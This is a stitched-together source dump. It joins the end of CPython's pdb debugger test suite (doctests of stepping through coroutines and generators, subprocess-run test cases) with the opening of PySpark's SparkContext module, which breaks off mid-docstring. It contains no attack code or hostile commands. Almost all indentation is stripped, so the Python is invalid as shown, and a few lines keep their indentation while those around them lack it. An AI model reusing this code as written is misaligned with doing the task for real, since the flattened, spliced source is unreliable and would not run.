(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Failed to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Failed to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
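# os.path.expanduser is patched so that Pdb looks for .pdbrc in our temporary
# directory instead of the real home directory.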
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
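# Illustrative helper (not used anywhere in this module): this is how the
# defaults above are merged into a SparkConf in _do_init below. setIfMissing
# only fills keys the user has not configured, so user-set values always win.
def _apply_default_configs_sketch(conf):
    for key, value in DEFAULT_CONFIGS.items():
        conf.setIfMissing(key, value)
    return conf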
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in the JVM properly, so use conf directly. This represents
# the scenario where the JVM has been launched before the SparkConf is created (e.g. a
# SparkContext is created and then stopped, and we create a new SparkConf and a new
# SparkContext again).
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in a function to allow subclass-specific initialization.
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Raises an error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
be invoked before instantiating SparkContext.
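For example (illustrative values)::

    SparkContext.setSystemProperty("spark.executor.memory", "2g")
    sc = SparkContext("local", "App Name")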
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), incremented by `step` for each element. It can be called in the
same way as Python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended for performance if the input represents a range.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
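# Each of the numSlices (initially empty) partitions regenerates its own slice
# of the range locally via mapPartitionsWithIndex, so the full range is never
# materialized on, or shipped from, the driver.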
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
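# Heuristic: roughly one batch per partition, clamped between 1 and the
# configured batch size (1024 when batchSize is 0, i.e. auto).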
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a temporary file and read back through readRDDFromFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
# readRDDFromFile eagerly reads the file, so we can delete it right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
